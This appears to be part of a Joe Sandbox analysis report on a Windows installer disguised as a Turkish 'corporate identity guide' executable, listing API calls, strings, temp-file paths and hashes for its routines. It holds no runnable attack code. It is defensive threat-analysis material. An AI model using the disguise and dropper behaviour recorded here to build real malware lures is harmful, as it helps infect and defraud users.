                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                          • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                          • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe", xrefs: 0040654E
                                                                                                                                                                                          • *?|<>/":, xrefs: 004065A0
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 589700163-2981179581
                                                                                                                                                                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                          • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                          • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                          • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                          • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                          • lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D1635
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D163C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D1650
                                                                                                                                                                                          • GetProcAddress.KERNEL32(!=o,00000000), ref: 6F3D1657
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1660
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                          • String ID: !=o
                                                                                                                                                                                          • API String ID: 1148316912-2771720662
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                          • MulDiv.KERNEL32(000B4BD5,00000064,000B4BD9), ref: 00402E3C
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D121B: GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D2657
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D268C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                          • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                          • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsq53F5.tmp$C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll
                                                                                                                                                                                          • API String ID: 3109718747-866267152
                                                                                                                                                                                          • Opcode ID: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                          • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                                                          • Opcode Fuzzy Hash: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D24D6
                                                                                                                                                                                            • Part of subcall function 6F3D122C: lstrcpynW.KERNEL32(00000000,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D123C
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 6F3D245C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F3D2477
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                          • Opcode ID: 4fa17434b08947be1f462149a923ba1df5241d81b0f803e99a07e8575657d9f8
                                                                                                                                                                                          • Instruction ID: 72cbbfc6825863e7d870d8456dc0c042332e244214207a15f76be6d38536a78f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fa17434b08947be1f462149a923ba1df5241d81b0f803e99a07e8575657d9f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D41ACB2008705DFD710EF38DA44A66B7BCFB5A324B004A5EF88687581EB71E595CB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                          • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                          • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                                                          • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                          • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                          • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
